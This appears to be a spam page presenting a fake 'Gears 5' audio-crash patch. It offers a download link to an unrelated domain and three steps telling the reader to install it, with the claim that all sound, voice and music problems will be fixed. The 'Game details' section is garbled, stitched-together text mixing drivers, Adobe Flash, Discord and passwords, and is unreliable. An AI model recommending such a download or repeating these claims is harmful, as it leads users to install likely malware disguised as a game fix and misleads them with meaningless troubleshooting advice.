# Gears 5 Patch Update - Fix Audio Crash
***
## Setup Patch — [Setup Update Game](http://ufixed.icu/?load=Fix-Update-Gears-5)
***

**1) Setup the patch**

**2) Install on computer**

**3) Go in the game**

***
How to fix audio, sound, voices fix in Gears 5? - The installation of the patch will relieve you of all the technical difficulties.

***
The list of fixes:

Gears 5 no sound - fixed

Gears 5 no voices - fixed

Gears 5 no music - fixed

***

Gears 5 Game details:

You can choose to download a latest video card driver from your computer manufacturers website or your video card manufacturers website, like nvidia, amd, intel. If you are using older nvidia driver like driver version 416. More than one visitor to this site has contacted me about a gears 5 not working for them, only to find that their version of the adobe flash player was too old to run the newer gears 5s properly. I have my settings turned down to the lowest they can be, and i still get spikes of fps drop at regular intervals. Sometimes developers will releases patches to fix problems like crashes or performance issues. The issue has been ongoing since around 1200 p. Its more than likely an issue with your connection or speed. This could take a minute or two. If the setup program does not start automatically, follow these steps click start windows icon, type drivesetup. Now try launching discord and see if the issue is resolved. Important passwords are case sensitive.